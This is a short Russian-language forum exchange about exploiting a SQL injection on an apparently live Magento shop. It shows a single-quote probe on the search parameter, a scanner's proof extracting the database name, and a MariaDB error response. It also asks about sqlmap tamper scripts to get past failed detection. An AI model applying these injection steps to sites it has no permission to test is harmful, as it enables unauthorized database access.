25.06.2021, 10:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от brown
↑
sql на магенто
/result/?q=1'
Акунетикс нашел sql даже выдернур имя БД
Код:
Proof of Exploit
SQL query - SELECT database()
admin8sasdasd
При отправке через бурп
site/result/?q=1'
Ответ:
Код:
HTTP/1.1 503 Service Unavailable
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1
Trace:
Error log record number:
Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.
Но при попытки крутануть мапом! Не видит скулю(
Пробывал --text-only
Может какой темпер есть под магенто?
Тут надо руками смотреть, на что срабатывает эррор и руками под это дело подгонять уже тампер.
|
|
|